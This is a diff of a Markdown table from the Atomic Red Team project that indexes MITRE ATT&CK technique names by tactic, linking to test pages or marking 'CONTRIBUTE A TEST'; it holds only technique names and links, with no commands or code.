-| Spearphishing Voice [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Command and Scripting Interpreter: PowerShell](../../T1059.001/T1059.001.md) | [Office Application Startup](../../T1137/T1137.md) | [Hijack Execution Flow: DLL Search Order Hijacking](../../T1574.001/T1574.001.md) | [Abuse Elevation Control Mechanism: Bypass User Account Control](../../T1548.002/T1548.002.md) | [Steal or Forge Kerberos Tickets: AS-REP Roasting](../../T1558.004/T1558.004.md) | [System Information Discovery](../../T1082/T1082.md) | [Lateral Tool Transfer](../../T1570/T1570.md) | Remote Data Staging [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Exfiltration Over Web Service: Exfiltration to Cloud Storage](../../T1567.002/T1567.002.md) | External Proxy [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Financial Theft [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
-| Compromise Software Supply Chain [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Inter-Process Communication](../../T1559/T1559.md) | [Boot or Logon Autostart Execution: Print Processors](../../T1547.012/T1547.012.md) | AppDomainManager [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Pre-OS Boot: System Firmware](../../T1542.001/T1542.001.md) | Steal or Forge Kerberos Tickets [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Network Configuration Discovery: Wi-Fi Discovery](../../T1016.002/T1016.002.md) | [Remote Service Session Hijacking: RDP Hijacking](../../T1563.002/T1563.002.md) | [Data from Local System](../../T1005/T1005.md) | [Data Transfer Size Limits](../../T1030/T1030.md) | Proxy [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Defacement: Internal Defacement](../../T1491.001/T1491.001.md) |
-| Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exploitation for Client Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Hijack Execution Flow: DLL Search Order Hijacking](../../T1574.001/T1574.001.md) | Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Hijack Execution Flow: Services Registry Permissions Weakness](../../T1574.011/T1574.011.md) | [Credentials from Password Stores](../../T1555/T1555.md) | [Application Window Discovery](../../T1010/T1010.md) | [Use Alternate Authentication Material: Pass the Hash](../../T1550.002/T1550.002.md) | Archive Collected Data: Archive via Library [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration Over Physical Medium [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Dynamic Resolution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
-| Hardware Additions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Command and Scripting Interpreter: Python [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Office Application Startup: Add-ins](../../T1137.006/T1137.006.md) | [Thread Execution Hijacking](../../T1055.003/T1055.003.md) | Bootkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Unsecured Credentials](../../T1552/T1552.md) | Email Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Remote Services: Remote Desktop Protocol](../../T1021.001/T1021.001.md) | [Archive Collected Data](../../T1560/T1560.md) | [Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol](../../T1048.003/T1048.003.md) | Web Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Account Access Removal](../../T1531/T1531.md) |
-| Drive-by Compromise [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | System Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Server Software Component: Transport Agent](../../T1505.002/T1505.002.md) | [Event Triggered Execution: Application Shimming](../../T1546.011/T1546.011.md) | Mavinject [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Hybrid Identity [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Time Based Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Browser Session Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | DNS Calculation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Data Encrypted for Impact](../../T1486/T1486.md) |
-| Spearphishing via Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Command and Scripting Interpreter: Windows Command Shell](../../T1059.003/T1059.003.md) | AppDomainManager [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Boot or Logon Autostart Execution: Port Monitors](../../T1547.010/T1547.010.md) | [Masquerading: Match Legitimate Name or Location](../../T1036.005/T1036.005.md) | [Credentials from Password Stores: Credentials from Web Browsers](../../T1555.003/T1555.003.md) | [Browser Bookmark Discovery](../../T1217/T1217.md) | | DHCP Spoofing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Multi-Stage Channels [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Endpoint Denial of Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
-| [Valid Accounts: Local Accounts](../../T1078.003/T1078.003.md) | [Command and Scripting Interpreter: Visual Basic](../../T1059.005/T1059.005.md) | Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Process Injection](../../T1055/T1055.md) | Masquerade File Type [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | DHCP Spoofing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Network Configuration Discovery](../../T1016/T1016.md) | | [Adversary-in-the-Middle: LLMNR/NBT-NS Poisoning and SMB Relay](../../T1557.001/T1557.001.md) | | Port Knocking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Resource Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
-| | Malicious Link [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Modify Authentication Process: Password Filter DLL](../../T1556.002/T1556.002.md) | Escape to Host [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Hide Artifacts](../../T1564/T1564.md) | [Unsecured Credentials: Private Keys](../../T1552.004/T1552.004.md) | Account Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Web Portal Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | File Transfer Protocols [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Transmitted Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
-| | [System Services: Service Execution](../../T1569.002/T1569.002.md) | [Server Software Component: Terminal Services DLL](../../T1505.005/T1505.005.md) | [Boot or Logon Autostart Execution: Shortcut Modification](../../T1547.009/T1547.009.md) | Domain Trust Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Adversary-in-the-Middle: LLMNR/NBT-NS Poisoning and SMB Relay](../../T1557.001/T1557.001.md) | [Domain Trust Discovery](../../T1482/T1482.md) | | [Video Capture](../../T1125/T1125.md) | | One-Way Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Data Destruction](../../T1485/T1485.md) |
-| | [Scheduled Task/Job: At](../../T1053.002/T1053.002.md) | [Browser Extensions](../../T1176/T1176.md) | [Boot or Logon Autostart Execution: Security Support Provider](../../T1547.005/T1547.005.md) | [Impair Defenses: Safe Boot Mode](../../T1562.009/T1562.009.md) | [OS Credential Dumping: LSASS Memory](../../T1003.001/T1003.001.md) | [File and Directory Discovery](../../T1083/T1083.md) | | Email Collection: Email Forwarding Rule [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | [Proxy: Multi-hop Proxy](../../T1090.003/T1090.003.md) | Network Denial of Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
-| | | Outlook Rules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Hijack Execution Flow: Path Interception by Search Order Hijacking](../../T1574.008/T1574.008.md) | [Virtualization/Sandbox Evasion: System Checks](../../T1497.001/T1497.001.md) | [Brute Force: Password Spraying](../../T1110.003/T1110.003.md) | [System Network Connections Discovery](../../T1049/T1049.md) | | Data Staged [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Data Obfuscation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Firmware Corruption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
-| | | [Event Triggered Execution: Application Shimming](../../T1546.011/T1546.011.md) | [Domain Policy Modification: Group Policy Modification](../../T1484.001/T1484.001.md) | [Signed Binary Proxy Execution: InstallUtil](../../T1218.004/T1218.004.md) | Web Portal Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | [Input Capture: GUI Input Capture](../../T1056.002/T1056.002.md) | | [Non-Standard Port](../../T1571/T1571.md) | [Inhibit System Recovery](../../T1490/T1490.md) |
-| | | [Boot or Logon Autostart Execution: Port Monitors](../../T1547.010/T1547.010.md) | [Valid Accounts: Default Accounts](../../T1078.001/T1078.001.md) | Stripped Payloads [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [OS Credential Dumping: Cached Domain Credentials](../../T1003.005/T1003.005.md) | [Log Enumeration](../../T1654/T1654.md) | | [Data from Network Shared Drive](../../T1039/T1039.md) | | [Encrypted Channel](../../T1573/T1573.md) | Disk Content Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
-| | | Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Time Providers](../../T1547.003/T1547.003.md) | [Hijack Execution Flow: DLL Search Order Hijacking](../../T1574.001/T1574.001.md) | [Steal or Forge Kerberos Tickets: Golden Ticket](../../T1558.001/T1558.001.md) | [Process Discovery](../../T1057/T1057.md) | | Email Collection: Remote Email Collection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Bidirectional Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Shutdown/Reboot](../../T1529/T1529.md) |
-| | | [Boot or Logon Autostart Execution: Shortcut Modification](../../T1547.009/T1547.009.md) | Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Code Signing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Steal or Forge Authentication Certificates](../../T1649/T1649.md) | User Activity Based Checks [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Input Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Asymmetric Cryptography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
-| | | [Boot or Logon Autostart Execution: Security Support Provider](../../T1547.005/T1547.005.md) | [Create Process with Token](../../T1134.002/T1134.002.md) | [File and Directory Permissions Modification: Windows File and Directory Permissions Modification](../../T1222.001/T1222.001.md) | [Unsecured Credentials: Credentials In Files](../../T1552.001/T1552.001.md) | [Permission Groups Discovery: Local Groups](../../T1069.001/T1069.001.md) | | ARP Cache Poisoning [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | [Non-Application Layer Protocol](../../T1095/T1095.md) | |
-| | | Hybrid Identity [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Boot or Logon Autostart Execution: Winlogon Helper DLL](../../T1547.004/T1547.004.md) | AppDomainManager [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Web Cookies [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Password Policy Discovery](../../T1201/T1201.md) | | Data from Information Repositories [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Protocol Impersonation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
-| | | [Hijack Execution Flow: Path Interception by Search Order Hijacking](../../T1574.008/T1574.008.md) | [Event Triggered Execution: Image File Execution Options Injection](../../T1546.012/T1546.012.md) | [Signed Binary Proxy Execution: Msiexec](../../T1218.007/T1218.007.md) | [Unsecured Credentials: Group Policy Preferences](../../T1552.006/T1552.006.md) | [System Location Discovery: System Language Discovery](../../T1614.001/T1614.001.md) | | [Input Capture: Credential API Hooking](../../T1056.004/T1056.004.md) | | Domain Fronting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
-| | | [Server Software Component: Web Shell](../../T1505.003/T1505.003.md) | Process Doppelgänging [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Modify Authentication Process: Password Filter DLL](../../T1556.002/T1556.002.md) | Network Provider DLL [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Query Registry](../../T1012/T1012.md) | | | | Data Encoding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
-| | | [Valid Accounts: Default Accounts](../../T1078.001/T1078.001.md) | Executable Installer File Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Clear Network Connection History and Configurations [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Forge Web Credentials [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Location Discovery](../../T1614/T1614.md) | | | | Non-Standard Encoding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
-| | | [Time Providers](../../T1547.003/T1547.003.md) | [Event Triggered Execution: Accessibility Features](../../T1546.008/T1546.008.md) | [Indicator Removal on Host: Clear Command History](../../T1070.003/T1070.003.md) | Multi-Factor Authentication Request Generation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Software Discovery: Security Software Discovery](../../T1518.001/T1518.001.md) | | | | [Application Layer Protocol: Web Protocols](../../T1071.001/T1071.001.md) | |
-| | | [Create Account: Local Account](../../T1136.001/T1136.001.md) | [Process Injection: Asynchronous Procedure Call](../../T1055.004/T1055.004.md) | [Indirect Command Execution](../../T1202/T1202.md) | Exploitation for Credential Access [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Remote System Discovery](../../T1018/T1018.md) | | | | [Ingress Tool Transfer](../../T1105/T1105.md) | |
-| | | [Boot or Logon Autostart Execution: Winlogon Helper DLL](../../T1547.004/T1547.004.md) | [Event Triggered Execution: AppCert DLLs](../../T1546.009/T1546.009.md) | [Deobfuscate/Decode Files or Information](../../T1140/T1140.md) | [Input Capture: GUI Input Capture](../../T1056.002/T1056.002.md) | [Network Service Discovery](../../T1046/T1046.md) | | | | Hide Infrastructure [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
-| | | [Event Triggered Execution: Image File Execution Options Injection](../../T1546.012/T1546.012.md) | Device Registration [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Impair Defenses](../../T1562/T1562.md) | Brute Force [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Software Discovery](../../T1518/T1518.md) | | | | [Data Obfuscation via Steganography](../../T1001.002/T1001.002.md) | |
-| | | Executable Installer File Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Process Injection: Portable Executable Injection](../../T1055.002/T1055.002.md) | [Thread Execution Hijacking](../../T1055.003/T1055.003.md) | [Brute Force: Credential Stuffing](../../T1110.004/T1110.004.md) | [Debugger Evasion](../../T1622/T1622.md) | | | | Fallback Channels [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
-| | | [Event Triggered Execution: Accessibility Features](../../T1546.008/T1546.008.md) | [Access Token Manipulation: Token Impersonation/Theft](../../T1134.001/T1134.001.md) | [Masquerading](../../T1036/T1036.md) | Multi-Factor Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Time Discovery](../../T1124/T1124.md) | | | | [Proxy: Internal Proxy](../../T1090.001/T1090.001.md) | |
-| | | [Create Account: Domain Account](../../T1136.002/T1136.002.md) | Make and Impersonate Token [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Email Collection: Mailbox Manipulation](../../T1070.008/T1070.008.md) | [Forced Authentication](../../T1187/T1187.md) | | | | | Dead Drop Resolver [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
-| | | Component Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Event Triggered Execution: Windows Management Instrumentation Event Subscription](../../T1546.003/T1546.003.md) | [Process Injection](../../T1055/T1055.md) | Input Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | Junk Data [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
-| | | [Office Application Startup: Office Template Macros.](../../T1137.001/T1137.001.md) | [Access Token Manipulation: Parent PID Spoofing](../../T1134.004/T1134.004.md) | Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | ARP Cache Poisoning [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | |
-| | | [Event Triggered Execution: AppCert DLLs](../../T1546.009/T1546.009.md) | [Event Triggered Execution: Change Default File Association](../../T1546.001/T1546.001.md) | [Signed Binary Proxy Execution](../../T1218/T1218.md) | [Steal or Forge Kerberos Tickets: Silver Ticket](../../T1558.002/T1558.002.md) | | | | | | |
-| | | Device Registration [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Services File Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Indicator Removal on Host: Timestomp](../../T1070.006/T1070.006.md) | [Credentials from Password Stores: Windows Credential Manager](../../T1555.004/T1555.004.md) | | | | | | |
-| | | Pre-OS Boot [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder](../../T1547.001/T1547.001.md) | [Reflective Code Loading](../../T1620/T1620.md) | Domain Controller Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | |
-| | | Port Knocking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Account Manipulation](../../T1098/T1098.md) | Ignore Process Interrupts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Reversible Encryption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | |
-| | | Network Provider DLL [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | KernelCallbackTable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Time Based Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Multi-Factor Authentication Interception [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | |
-| | | [Event Triggered Execution: Windows Management Instrumentation Event Subscription](../../T1546.003/T1546.003.md) | Hijack Execution Flow [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Signed Binary Proxy Execution: CMSTP](../../T1218.003/T1218.003.md) | [OS Credential Dumping: NTDS](../../T1003.003/T1003.003.md) | | | | | | |
-| | | Compromise Host Software Binary [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Impair Defenses: Disable Windows Event Logging](../../T1562.002/T1562.002.md) | [Steal or Forge Kerberos Tickets: Kerberoasting](../../T1558.003/T1558.003.md) | | | | | | |
-| | | [Event Triggered Execution: Change Default File Association](../../T1546.001/T1546.001.md) | [Process Injection: Process Hollowing](../../T1055.012/T1055.012.md) | [Signed Binary Proxy Execution: Control Panel](../../T1218.002/T1218.002.md) | [OS Credential Dumping: DCSync](../../T1003.006/T1003.006.md) | | | | | | |
-| | | Services File Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exploitation for Privilege Escalation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Use Alternate Authentication Material [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Modify Authentication Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | |
-| | | [Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder](../../T1547.001/T1547.001.md) | [Event Triggered Execution](../../T1546/T1546.md) | [Impair Defenses: Disable or Modify System Firewall](../../T1562.004/T1562.004.md) | [Input Capture: Credential API Hooking](../../T1056.004/T1056.004.md) | | | | | | |
+| Compromise Hardware Supply Chain [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Inter-Process Communication: Dynamic Data Exchange](../../T1559.002/T1559.002.md) | [Event Triggered Execution: PowerShell Profile](../../T1546.013/T1546.013.md) | [Event Triggered Execution: PowerShell Profile](../../T1546.013/T1546.013.md) | Embedded Payloads [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Steal Web Session Cookie](../../T1539/T1539.md) | [Device Driver Discovery](../../T1652/T1652.md) | Use Alternate Authentication Material [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Sharepoint [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration Over Bluetooth [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Publish/Subscribe Protocols [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Application Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
+| [Replication Through Removable Media](../../T1091/T1091.md) | [User Execution: Malicious File](../../T1204.002/T1204.002.md) | Create or Modify System Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Create or Modify System Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | File/Path Exclusions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [OS Credential Dumping: Security Account Manager](../../T1003.002/T1003.002.md) | [Account Discovery: Domain Account](../../T1087.002/T1087.002.md) | Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Audio Capture](../../T1123/T1123.md) | [Automated Exfiltration](../../T1020/T1020.md) | Symmetric Cryptography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Disk Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
+| [Supply Chain Compromise](../../T1195/T1195.md) | Component Object Model [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [External Remote Services](../../T1133/T1133.md) | [Abuse Elevation Control Mechanism: Bypass User Account Control](../../T1548.002/T1548.002.md) | [Signed Script Proxy Execution: Pubprn](../../T1216.001/T1216.001.md) | [Brute Force: Password Cracking](../../T1110.002/T1110.002.md) | [Account Discovery: Local Account](../../T1087.001/T1087.001.md) | Remote Service Session Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Archive via Custom Method [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration Over Symmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Fast Flux DNS [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Stored Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
+| Exploit Public-Facing Application [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Pre-OS Boot: System Firmware](../../T1542.001/T1542.001.md) | [Hijack Execution Flow: Services Registry Permissions Weakness](../../T1574.011/T1574.011.md) | Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [OS Credential Dumping: LSA Secrets](../../T1003.004/T1003.004.md) | [Virtualization/Sandbox Evasion: System Checks](../../T1497.001/T1497.001.md) | [Remote Services: Windows Remote Management](../../T1021.006/T1021.006.md) | Email Collection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration to Code Repository [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Application Layer Protocol](../../T1071/T1071.md) | [Service Stop](../../T1489/T1489.md) |
+| Content Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Native API](../../T1106/T1106.md) | [Hijack Execution Flow: Services Registry Permissions Weakness](../../T1574.011/T1574.011.md) | [Boot or Logon Autostart Execution](../../T1547/T1547.md) | [Direct Volume Access](../../T1006/T1006.md) | Forge Web Credentials: SAML token [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Permission Groups Discovery: Domain Groups](../../T1069.002/T1069.002.md) | [Remote Services: Distributed Component Object Model](../../T1021.003/T1021.003.md) | [Data from Removable Media](../../T1025/T1025.md) | [Exfiltration Over Alternative Protocol - Exfiltration Over Asymmetric Encrypted Non-C2 Protocol](../../T1048.002/T1048.002.md) | [Remote Access Software](../../T1219/T1219.md) | Application or System Exploitation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
+| [Valid Accounts: Default Accounts](../../T1078.001/T1078.001.md) | AutoHotKey & AutoIT [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Bootkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Active Setup](../../T1547.014/T1547.014.md) | Hide Artifacts: Email Hiding Rules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Password Managers [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Service Discovery](../../T1007/T1007.md) | [Use Alternate Authentication Material: Pass the Ticket](../../T1550.003/T1550.003.md) | [Data Staged: Local Data Staging](../../T1074.001/T1074.001.md) | [Exfiltration Over C2 Channel](../../T1041/T1041.md) | Content Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Runtime Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
